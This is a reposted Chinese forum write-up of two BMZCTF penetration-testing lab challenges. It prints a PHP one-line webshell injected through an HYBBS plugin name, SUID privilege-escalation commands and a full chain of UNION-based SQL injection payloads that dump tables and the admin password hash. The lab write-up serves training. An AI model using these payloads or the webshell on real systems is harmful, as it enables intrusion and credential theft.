• 售前

  • 售后

热门帖子
入门百科

[BZMCTF]综合渗透部分 writeup

[复制链接]
123456790 显示全部楼层 发表于 2022-1-12 12:09:44 |阅读模式 打印 上一主题 下一主题
[BZMCTF]综合渗透部分 writeup



靶场:http://www.bmzclub.cn/challenges

伟大宝宝的宝藏

1.后台getshell


Powered by HYBBS Version 12.25.4(官方:http://bbs.hyphp.cn/ 、https://github.com/hyyyp/HYBBS2/releases/tag/HYBBS2.3)于是开始搜索HYBBS的漏洞,找到了这篇博客https://blog.caogenba.net/weixin_50359752/article/details/108869507,需要用户登陆,但是自己注册的用户没有后台登陆的选项,还是需要管理员用户

如果账户不存在会回显,可以推出存在admin账户,看了wp,发现原题有提示的
   比赛题目:综合渗透区——《伟大宝宝的宝藏》
题目场景:初出茅庐的程序员伟大宝宝给公司做了一个网站,由于采用了通用的CMS所以他把存在的漏洞给修复好了,顺便做了些二次开发。
在他认为网站非常坚固的情况下,网站上线的第一天服务器就被黑客拿下来了,并且还打穿了公司内网导致公司损失重大。
他所在的公司立刻找到了你并给了你一个渗透测试项目,需要你来寻找黑客入侵的途径,并找到黑客是如何获取/root/目录下的flag文件信息的。
  社工密码字典在线生成 https://api.xiaobaibk.com/lab/guess/

得到密码baobao123456789

上传模板zip没有反应,后来发现插件名也可以命令执行,新建插件,插件名111',phpinfo(),//,然后植入一句话111', @eval($_POST['g']),//


但是具体找存放插件名的php文件需要自己本地试一下,/Plugin/111/conf.php

2.suid提权

尝试查找具有root权限的SUID的可执行文件
  1. <code>find / -user root -perm -4000 -print 2>/dev/null
复制代码

xxd /root/flag


   参考wp:http://www.hackdig.com/11/hack-202888.htm
  
sqlguncms

1.玩玩搜索框sql注入


sqlgun新闻发布系统,这好像是个awd靶场,网上可以下载源码,但是找不到官网

搜索框试试,是mysql模糊查询,order by测列数,是3列
  1. <code>' order by 3 -- -
  2. # select id from news where title like '%' order by 3 -- -%'
  3. # Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/html/sqlgunsearch.php on line 32
复制代码
查看回显点
  1. <code>1' union select 11,2,3 -- -
复制代码

  1. 1' union select 11,database(),3 -- -
  2. # 数据库 sqlgunnews
  3. 1' union select 11,group_concat(TABLE_NAME,0x3c2f62723e),3 from information_schema.TABLES where TABLE_SCHEMA='sqlgunnews'-- -
  4. #库里的表名 admin,class,news,system
  5. 1' union select 11,group_concat(COLUMN_NAME,0x3c2f62723e),3 from information_schema.COLUMNS where TABLE_NAME='admin'-- -
  6. #admin表的字段有id,admin,password
  7. 1' union select 11,group_concat(admin, 0x3c2f62723e,password),3 from admin-- -
  8. # admin        21232f297a57a5a743894a0e4a801fc3
复制代码

somd5解密

凸(艹皿艹 )我刚刚在干嘛,这不一个admin/admin就进来后台了
2.后台登陆+容易文件读取

这个框架有个后台/sqlgunadmin/login.php

验证码是假验证码,不用输,进入后台后翻翻,可以下载日志,看看能不能任意文件下载(他后台代码有问题,写得是get接受参数,但是他前端是post传参的,要自己改改)


3.后台文件上传getshell




在发布新闻的框里上传图片
来源:https://blog.caogenba.net/weixin_46081055/article/details/122339539
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作